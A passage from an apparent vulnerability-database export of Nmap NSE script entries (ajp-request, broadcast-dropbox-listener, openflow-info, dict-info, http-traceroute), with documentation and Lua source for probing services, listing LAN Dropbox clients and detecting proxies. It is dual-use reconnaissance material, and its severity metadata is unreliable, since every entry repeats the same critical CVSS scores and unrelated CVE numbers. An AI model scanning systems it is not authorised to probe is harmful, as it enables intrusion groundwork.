slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 8009 <ip> --script ajp-request\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 8009/tcp open ajp13\n | ajp-request:\n | <!DOCTYPE HTML>\n | <html>\n | <head>\n | <title>JSP Test</title>\n |\n | </head>\n | <body>\n | <h2>Hello, World.</h2>\n | Fri May 04 02:09:40 UTC 2012\n | </body>\n |_</html>\n \n\n## Requires \n\n * [ajp](<../lib/ajp.html>)\n * [io](<>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-14T21:30:24", "type": "nmap", "title": "ajp-request NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:AJP-REQUEST.NSE", "href": "https://nmap.org/nsedoc/scripts/ajp-request.html", "sourceData": "local ajp = require \"ajp\"\nlocal io = require \"io\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nRequests a URI over the Apache JServ Protocol and displays the result\n(or stores it in a file). Different AJP methods such as; GET, HEAD,\nTRACE, PUT or DELETE may be used.\n\nThe Apache JServ Protocol is commonly used by web servers to communicate with\nback-end Java application server containers.\n]]\n\n---\n-- @usage\n-- nmap -p 8009 <ip> --script ajp-request\n--\n-- @output\n-- PORT STATE SERVICE\n-- 8009/tcp open ajp13\n-- | ajp-request:\n-- | <!DOCTYPE HTML>\n-- | <html>\n-- | <head>\n-- | <title>JSP Test</title>\n-- |\n-- | </head>\n-- | <body>\n-- | <h2>Hello, World.</h2>\n-- | Fri May 04 02:09:40 UTC 2012\n-- | </body>\n-- |_</html>\n--\n-- @args method AJP method to be used when requesting the URI (default: GET)\n-- @args path the path part of the URI to request\n-- @args filename the name of the file where the results should be stored\n-- @args username the username to use to access protected resources\n-- @args password the password to use to access protected resources\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(8009, 'ajp13', 'tcp')\n\nlocal arg_method = stdnse.get_script_args(SCRIPT_NAME .. \".method\") or \"GET\"\nlocal arg_path = stdnse.get_script_args(SCRIPT_NAME .. \".path\") or \"/\"\nlocal arg_file = stdnse.get_script_args(SCRIPT_NAME .. \".filename\")\nlocal arg_username = stdnse.get_script_args(SCRIPT_NAME .. \".username\")\nlocal arg_password = stdnse.get_script_args(SCRIPT_NAME .. \".password\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n\n local helper = ajp.Helper:new(host, port)\n if ( not(helper:connect()) ) then\n return fail(\"Failed to connect to AJP server\")\n end\n\n local valid_methods = {\n [\"GET\"] = true,\n [\"HEAD\"] = true,\n [\"TRACE\"] = true,\n [\"PUT\"] = true,\n [\"DELETE\"] = true,\n [\"OPTIONS\"]= true,\n }\n\n local method = arg_method:upper()\n if ( not(valid_methods[method]) ) then\n return fail((\"Method not supported: %s\"):format(arg_method))\n end\n\n local options = { auth = { username = arg_username, password = arg_password } }\n local status, response = helper:request(arg_method, arg_path, nil, nil, options)\n if ( not(status) ) then\n return fail(\"Failed to retrieve response for request\")\n end\n helper:close()\n\n if ( response ) then\n local output = response.status_line .. \"\\n\" ..\n table.concat(response.rawheaders, \"\\n\") ..\n (response.body and \"\\n\\n\" .. response.body or \"\")\n if ( arg_file ) then\n local f = io.open(arg_file, \"w\")\n if ( not(f) ) then\n return fail((\"Failed to open file %s for writing\"):format(arg_file))\n end\n f:write(output)\n f:close()\n return (\"Response was written to file: %s\"):format(arg_file)\n else\n return \"\\n\" .. output\n end\n end\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:47:06", "description": "Listens for the LAN sync information broadcasts that the Dropbox.com client broadcasts every 20 seconds, then prints all the discovered client IP addresses, port numbers, version numbers, display names, and more. \n\nIf the `newtargets` script argument is given, all discovered Dropbox clients will be added to the Nmap target list rather than just listed in the output.\n\n## Script Arguments \n\n#### max-newtargets, newtargets \n\nSee the documentation for the [target](<../lib/target.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=broadcast-dropbox-listener\n nmap --script=broadcast-dropbox-listener --script-args=newtargets -Pn\n\n## Script Output \n \n \n Pre-scan script results:\n | broadcast-dropbox-listener:\n | displayname ip port version host_int namespaces\n |_noob 192.168.0.110 17500 1.8 34176083 26135075\n \n Pre-scan script results:\n | broadcast-dropbox-listener:\n | displayname ip port version host_int namespaces\n |_noob 192.168.0.110 17500 1.8 34176083 26135075\n Nmap scan report for 192.168.0.110\n Host is up (0.00073s latency).\n Not shown: 997 filtered ports\n PORT STATE SERVICE\n 139/tcp open netbios-ssn\n 445/tcp open microsoft-ds\n 1047/tcp open neod1\n\n## Requires \n\n * [json](<../lib/json.html>)\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [tab](<../lib/tab.html>)\n * [target](<../lib/target.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-01-13T07:17:59", "type": "nmap", "title": "broadcast-dropbox-listener NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:BROADCAST-DROPBOX-LISTENER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-dropbox-listener.html", "sourceData": "local json = require \"json\"\nlocal nmap = require \"nmap\"\nlocal stdnse = require \"stdnse\"\nlocal tab = require \"tab\"\nlocal target = require \"target\"\nlocal table = require \"table\"\n\ndescription = [[\nListens for the LAN sync information broadcasts that the Dropbox.com client\nbroadcasts every 20 seconds, then prints all the discovered client IP\naddresses, port numbers, version numbers, display names, and more.\n\nIf the <code>newtargets</code> script argument is given, all discovered Dropbox\nclients will be added to the Nmap target list rather than just listed in the\noutput.\n]]\n\n---\n-- @usage\n-- nmap --script=broadcast-dropbox-listener\n-- nmap --script=broadcast-dropbox-listener --script-args=newtargets -Pn\n-- @output\n-- Pre-scan script results:\n-- | broadcast-dropbox-listener:\n-- | displayname ip port version host_int namespaces\n-- |_noob 192.168.0.110 17500 1.8 34176083 26135075\n--\n-- Pre-scan script results:\n-- | broadcast-dropbox-listener:\n-- | displayname ip port version host_int namespaces\n-- |_noob 192.168.0.110 17500 1.8 34176083 26135075\n-- Nmap scan report for 192.168.0.110\n-- Host is up (0.00073s latency).\n-- Not shown: 997 filtered ports\n-- PORT STATE SERVICE\n-- 139/tcp open netbios-ssn\n-- 445/tcp open microsoft-ds\n-- 1047/tcp open neod1\n\nauthor = {\"Ron Bowes\", \"Mak Kolybabi\", \"Andrew Orr\", \"Russ Tait Milne\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"safe\"}\n\n\nlocal DROPBOX_BROADCAST_PERIOD = 20\nlocal DROPBOX_PORT = 17500\n\nprerule = function()\n return true\nend\n\naction = function()\n -- Start listening for broadcasts.\n local sock = nmap.new_socket(\"udp\")\n sock:set_timeout(2 * DROPBOX_BROADCAST_PERIOD * 1000)\n local status, result = sock:bind(nil, DROPBOX_PORT)\n if not status then\n stdnse.debug1(\"Could not bind on port %d: %s\", DROPBOX_PORT, result)\n sock:close()\n return\n end\n\n -- Keep track of the IDs we've already seen.\n local ids = {}\n\n -- Initialize the output table.\n local results = tab.new(6)\n tab.addrow(\n results,\n 'displayname',\n 'ip',\n 'port',\n 'version',\n 'host_int',\n 'namespaces'\n )\n\n local status, result = sock:receive()\n while status do\n -- Parse JSON.\n local status, info = json.parse(result)\n if status then\n -- Get IP address of broadcasting host.\n local status, _, _, ip, _ = sock:get_info()\n if not status then\n stdnse.debug1(\"Failed to get socket info.\")\n break\n end\n stdnse.debug1(\"Received broadcast from host %s (%s).\", info.displayname, ip)\n\n -- Check if we've already seen this ID.\n if ids[info.host_int] then\n -- We can stop now, since we've seen the same ID twice\n -- If ever a host sends a broadcast twice in a row, this will\n -- artificially stop the listener. I can't think of a workaround\n -- for now, so this will have to do.\n break\n end\n ids[info.host_int] = true\n\n -- Add host scan list.\n if target.ALLOW_NEW_TARGETS then\n target.add(ip)\n end\n\n -- Add host to list.\n for _, key1 in pairs({\"namespaces\", \"version\"}) do\n for key2, val in pairs(info[key1]) do\n info[key1][key2] = tostring(info[key1][key2])\n end\n end\n tab.addrow(\n results,\n info.displayname,\n ip,\n info.port,\n table.concat(info.version, \".\"),\n info.host_int,\n table.concat(info.namespaces, \", \")\n )\n\n stdnse.debug1(\"Added host %s.\", info.displayname)\n end\n\n status, result = sock:receive()\n end\n\n sock:close()\n\n -- If no broadcasts received, don't output anything.\n if not next(ids) then\n return\n end\n\n -- Format table, without trailing newline.\n results = tab.dump(results)\n results = results:sub(1, #results - 1)\n\n return \"\\n\" .. results\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:21", "description": "Queries OpenFlow controllers for information. Newer versions of the OpenFlow protocol (1.3 and greater) will return a list of all protocol versions supported by the controller. Versions prior to 1.3 only return their own version number. \n\nFor additional information: \n\n * <https://www.opennetworking.org/images/stories/downloads/sdn-resources/onf-specifications/openflow/openflow-switch-v1.5.0.noipr.pdf>\n\n## Example Usage \n \n \n nmap -p 6633,6653 --script openflow-info <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 6653/tcp open openflow\n | openflow-info:\n | OpenFlow Running Version: 1.5.X\n | OpenFlow Versions Supported:\n | 1.0\n | 1.1\n | 1.2\n | 1.3.X\n | 1.4.X\n |_ 1.5.X\n\n## Requires \n\n * [comm](<../lib/comm.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [match](<../lib/match.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-10-19T17:13:23", "type": "nmap", "title": "openflow-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-10-19T17:13:23", "id": "NMAP:OPENFLOW-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/openflow-info.html", "sourceData": "local comm = require \"comm\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal match = require \"match\"\nlocal table = require \"table\"\n\ndescription = [[\nQueries OpenFlow controllers for information. Newer versions of the OpenFlow\nprotocol (1.3 and greater) will return a list of all protocol versions supported\nby the controller. Versions prior to 1.3 only return their own version number.\n\nFor additional information:\n* https://www.opennetworking.org/images/stories/downloads/sdn-resources/onf-specifications/openflow/openflow-switch-v1.5.0.noipr.pdf\n]]\n\n---\n-- @usage nmap -p 6633,6653 --script openflow-info <target>\n-- @output\n-- PORT STATE SERVICE REASON\n-- 6653/tcp open openflow\n-- | openflow-info:\n-- | OpenFlow Running Version: 1.5.X\n-- | OpenFlow Versions Supported:\n-- | 1.0\n-- | 1.1\n-- | 1.2\n-- | 1.3.X\n-- | 1.4.X\n-- |_ 1.5.X\n\nauthor = {\"Jay Smith\", \"Mak Kolybabi <mak@kolybabi.com>\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"safe\"}\n\n-- OpenFlow versions released:\n-- 0x01 = 1.0\n-- 0x02 = 1.1\n-- 0x03 = 1.2\n-- 0x04 = 1.3.X\n-- 0x05 = 1.4.X\n-- 0x06 = 1.5.X\n-- The bits in the version bitmap are indexed by the ofp version number of the\n-- protocol. If the bit identified by the number of left bitshift equal\n-- to a ofp version number is set, this OpenFlow version is supported.\nlocal openflow_versions = {\n [0x02] = \"1.0\",\n [0x04] = \"1.1\",\n [0x08] = \"1.2\",\n [0x10] = \"1.3.X\",\n [0x20] = \"1.4.X\",\n [0x40] = \"1.5.X\"\n}\n\nlocal OPENFLOW_HEADER_SIZE = 8\nlocal OFPT_HELLO = 0\nlocal OFPHET_VERSIONBITMAP = 1\n\nportrule = shortport.version_port_or_service({6633, 6653}, \"openflow\", \"tcp\")\n\nreceive_message = function(host, port)\n local hello = string.pack(\n \">I1 I1 I2 I4\",\n 0x04,\n OFPT_HELLO,\n OPENFLOW_HEADER_SIZE,\n 0xFFFFFFFF\n )\n\n -- Handshake Info:\n -- Versions 1.3.1 and later say hello with a bitmap of versions supported\n -- Earlier versions either say hello without the bitmap.\n -- Some implementations are shy and don't make the first move, so we'll say\n -- hello first. We'll pretend to be a switch using version 1.0 of the protocol\n local socket, response = comm.tryssl(host, port, hello, {bytes = OPENFLOW_HEADER_SIZE})\n if not socket then\n stdnse.debug1(\"Failed to connect to service: %s\", response)\n return\n end\n\n if #response < OPENFLOW_HEADER_SIZE then\n socket:close()\n stdnse.debug1(\"Initial packet received was %d bytes, need >= %d bytes.\", #response, OPENFLOW_HEADER_SIZE)\n return\n end\n\n -- The first byte is the protocol version number being used. So long as that\n -- number is less than the currently-published versions, then we can be\n -- confident in our parsing of the packet.\n local pos = 1\n local message = {}\n local message_version, pos = string.unpack(\">I1\", response, 1)\n if message_version > 0x06 then\n socket:close()\n stdnse.debug1(\"Initial packet received had unrecognized version %d.\", message_version)\n return\n end\n message.version = message_version\n\n -- The second byte is the packet type.\n local message_type, pos = string.unpack(\">I1\", response, pos)\n message.type = message_type\n\n -- The fourth and fifth bytes are the length of the entire message, including\n -- the header and length itself.\n local message_length, pos = string.unpack(\">I2\", response, pos)\n if message_length < OPENFLOW_HEADER_SIZE then\n socket:close()\n stdnse.debug1(\"Response declares length as %d bytes, need >= %d bytes.\", message_length, OPENFLOW_HEADER_SIZE)\n return\n end\n message.length = message_length\n\n -- The remainder of the header contains the ID.\n local message_id, pos = string.unpack(\">I4\", response, pos)\n message.id = message_id\n\n -- All remaining data from the response, up until the message length, is the body.\n assert(pos == OPENFLOW_HEADER_SIZE + 1)\n message.body = response:sub(pos, message_length)\n\n -- If we have the whole packet, pass it up the call stack.\n if message_length <= #response then\n socket:close()\n return message\n end\n\n -- If message length is larger than the data we already have, receive the\n -- remainder of the packet.\n local missing_bytes = message_length - #response\n local status, body = socket:receive_buf(match.numbytes(missing_bytes), true)\n if not status then\n socket:close()\n stdnse.debug1(\"Failed to receive missing %d bytes of response: %s\", missing_bytes, body)\n return\n end\n message.body = (response .. body):sub(pos, message_length)\n\n return message\nend\n\nretrieve_version_bitmap = function(message)\n -- HELLO message structure:\n -- /* OFPT_HELLO. This message includes zero or more hello elements having\n -- * variable size. Unknown elements types must be ignored/skipped, to allow\n -- * for future extensions. */\n -- struct ofp_hello {\n -- struct ofp_header header;\n -- /* Hello element list */\n -- struct ofp_hello_elem_header elements[0]; /* List of elements - 0 or more */\n -- };\n -- The HELLO message may contain zero or more hello elements. One of these\n -- hello elements may be of the type OFPHET_VERSIONBITMAP. We must search\n -- through elements until we find OFPHET_VERSIONBITMAP.\n -- Note: As of version 1.5, OFPHET_VERSIONBITMAP is the only standard hello element type.\n -- However, we can not assume that this will be the case for long.\n local pos = 1\n local body = message.body\n while pos + 4 < #body - 1 do\n local element_length, element_type\n element_type, element_length, pos = string.unpack(\">I2 I2\", body, pos)\n if pos + element_length < #body then\n stdnse.debug1(\"Ran out of data parsing element type %d at position %d.\", element_type, pos)\n return\n end\n\n if element_type == OFPHET_VERSIONBITMAP then\n return string.unpack(\">I4\", body, pos)\n end\n\n pos = pos + element_length - 4\n end\n\n return\nend\n\naction = function(host, port)\n local output = stdnse.output_table()\n\n local message = receive_message(host, port)\n if not message then\n return\n end\n\n output[\"OpenFlow Version Running\"] = openflow_versions[2 ^ message.version]\n if message.type ~= OFPT_HELLO then\n return output\n end\n\n local version_bitmap = retrieve_version_bitmap(message)\n if not version_bitmap then\n return output\n end\n\n local supported_versions = {}\n for mask, version in pairs(openflow_versions) do\n if mask & version_bitmap then\n table.insert(supported_versions, version)\n end\n end\n table.sort(supported_versions)\n output[\"OpenFlow Versions Supported\"] = supported_versions\n\n return output\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:46:04", "description": "Connects to a dictionary server using the DICT protocol, runs the SHOW SERVER command, and displays the result. The DICT protocol is defined in RFC 2229 and is a protocol which allows a client to query a dictionary server for definitions from a set of natural language dictionary databases. \n\nThe SHOW server command must be implemented and depending on access will show server information and accessible databases. If authentication is required, the list of databases will not be shown.\n\n## Example Usage \n \n \n nmap -p 2628 <ip> --script dict-info\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 2628/tcp open dict\n | dict-info:\n | dictd 1.12.0/rf on Linux 3.0.0-12-generic\n | On ubu1110: up 15.000, 4 forks (960.0/hour)\n |\n | Database Headwords Index Data Uncompressed\n | bouvier 6797 128 kB 2338 kB 6185 kB\n |_ fd-eng-swe 5489 76 kB 77 kB 204 kB\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [match](<../lib/match.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-14T21:37:39", "type": "nmap", "title": "dict-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-18T01:08:19", "id": "NMAP:DICT-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/dict-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal match = require \"match\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nConnects to a dictionary server using the DICT protocol, runs the SHOW\nSERVER command, and displays the result. The DICT protocol is defined in RFC\n2229 and is a protocol which allows a client to query a dictionary server for\ndefinitions from a set of natural language dictionary databases.\n\nThe SHOW server command must be implemented and depending on access will show\nserver information and accessible databases. If authentication is required, the\nlist of databases will not be shown.\n]]\n\n---\n-- @usage\n-- nmap -p 2628 <ip> --script dict-info\n--\n-- @output\n-- PORT STATE SERVICE\n-- 2628/tcp open dict\n-- | dict-info:\n-- | dictd 1.12.0/rf on Linux 3.0.0-12-generic\n-- | On ubu1110: up 15.000, 4 forks (960.0/hour)\n-- |\n-- | Database Headwords Index Data Uncompressed\n-- | bouvier 6797 128 kB 2338 kB 6185 kB\n-- |_ fd-eng-swe 5489 76 kB 77 kB 204 kB\n--\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.port_or_service(2628, \"dict\", \"tcp\")\n\nlocal function fail(err) return stdnse.format_output(false, err) end\n\naction = function(host, port)\n local socket = nmap.new_socket()\n if ( not(socket:connect(host, port)) ) then\n return fail(\"Failed to connect to dictd server\")\n end\n\n local probes = {\n 'client \"dict 1.12.0/rf on Linux 3.0.0-12-generic\"',\n 'show server',\n 'quit',\n }\n\n if ( not(socket:send(table.concat(probes, \"\\r\\n\") .. \"\\r\\n\")) ) then\n return fail(\"Failed to send request to server\")\n end\n\n local srvinfo\n\n repeat\n local status, data = socket:receive_buf(match.pattern_limit(\"\\r\\n\", 2048), false)\n if ( not(status) ) then\n return fail(\"Failed to read response from server\")\n elseif ( data:match(\"^5\") ) then\n return fail(data)\n elseif ( data:match(\"^114\") ) then\n srvinfo = {}\n elseif ( srvinfo and not(data:match(\"^%.$\")) ) then\n table.insert(srvinfo, data)\n end\n until(not(status) or data:match(\"^221\") or data:match(\"^%.$\"))\n socket:close()\n\n -- if last item is an empty string remove it, to avoid trailing line feed\n srvinfo[#srvinfo] = ( srvinfo[#srvinfo] ~= \"\" and srvinfo[#srvinfo] or nil )\n\n return stdnse.format_output(true, srvinfo)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:42:43", "description": "Exploits the Max-Forwards HTTP header to detect the presence of reverse proxies. \n\nThe script works by sending HTTP requests with values of the Max-Forwards HTTP header varying from 0 to 2 and checking for any anomalies in certain response values such as the status code, Server, Content-Type and Content-Length HTTP headers and body values such as the HTML title. \n\nBased on the work of: \n\n * Nicolas Gregoire (nicolas.gregoire@agarri.fr) \n * Julien Cayssol (tools@aqwz.com) \n\nFor more information, see: \n\n * <http://www.agarri.fr/kom/archives/2011/11/12/traceroute-like_http_scanner/index.html>\n\n## Script Arguments \n\n#### http-traceroute.path \n\nThe path to send requests to. Defaults to `/`.\n\n#### http-traceroute.method \n\nHTTP request method to use. Defaults to `GET`. Among other values, TRACE is probably the most interesting.\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap --script=http-traceroute <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-traceroute:\n | HTML title\n | Hop #1: Twitter / Over capacity\n | Hop #2: t.co / Twitter\n | Hop #3: t.co / Twitter\n | Status Code\n | Hop #1: 502\n | Hop #2: 200\n | Hop #3: 200\n | server\n | Hop #1: Apache\n | Hop #2: hi\n | Hop #3: hi\n | content-type\n | Hop #1: text/html; charset=UTF-8\n | Hop #2: text/html; charset=utf-8\n | Hop #3: text/html; charset=utf-8\n | content-length\n | Hop #1: 4833\n | Hop #2: 3280\n | Hop #3: 3280\n | last-modified\n | Hop #1: Thu, 05 Apr 2012 00:19:40 GMT\n | Hop #2\n |_ Hop #3\n\n## Requires \n\n * [http](<../lib/http.html>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-05-20T15:42:33", "type": "nmap", "title": "http-traceroute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:HTTP-TRACEROUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/http-traceroute.html", "sourceData": "local http = require \"http\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\n\ndescription = [[\nExploits the Max-Forwards HTTP header to detect the presence of reverse proxies.\n\nThe script works by sending HTTP requests with values of the Max-Forwards HTTP\nheader varying from 0 to 2 and checking for any anomalies in certain response\nvalues such as the status code, Server, Content-Type and Content-Length HTTP\nheaders and body values such as the HTML title.\n\nBased on the work of:\n* Nicolas Gregoire (nicolas.gregoire@agarri.fr)\n* Julien Cayssol (tools@aqwz.com)\n\nFor more information, see:\n* http://www.agarri.fr/kom/archives/2011/11/12/traceroute-like_http_scanner/index.html\n]]\n\n---\n-- @args http-traceroute.path The path to send requests to. Defaults to <code>/</code>.\n-- @args http-traceroute.method HTTP request method to use. Defaults to <code>GET</code>.\n-- Among other values, TRACE is probably the most interesting.\n--\n-- @usage\n-- nmap --script=http-traceroute <targets>\n--\n--@output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-traceroute:\n-- | HTML title\n-- | Hop #1: Twitter / Over capacity\n-- | Hop #2: t.co / Twitter\n-- | Hop #3: t.co / Twitter\n-- | Status Code\n-- | Hop #1: 502\n-- | Hop #2: 200\n-- | Hop #3: 200\n-- | server\n-- | Hop #1: Apache\n-- | Hop #2: hi\n-- | Hop #3: hi\n-- | content-type\n-- | Hop #1: text/html; charset=UTF-8\n-- | Hop #2: text/html; charset=utf-8\n-- | Hop #3: text/html; charset=utf-8\n-- | content-length\n-- | Hop #1: 4833\n-- | Hop #2: 3280\n-- | Hop #3: 3280\n-- | last-modified\n-- | Hop #1: Thu, 05 Apr 2012 00:19:40 GMT\n-- | Hop #2\n-- |_ Hop #3\n\nauthor = \"Hani Benhabiles\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = shortport.service(\"http\")\n\n--- Attempts to extract the html title\n-- from an HTTP response body.\n--@param responsebody Response's body.\nlocal function extract_title 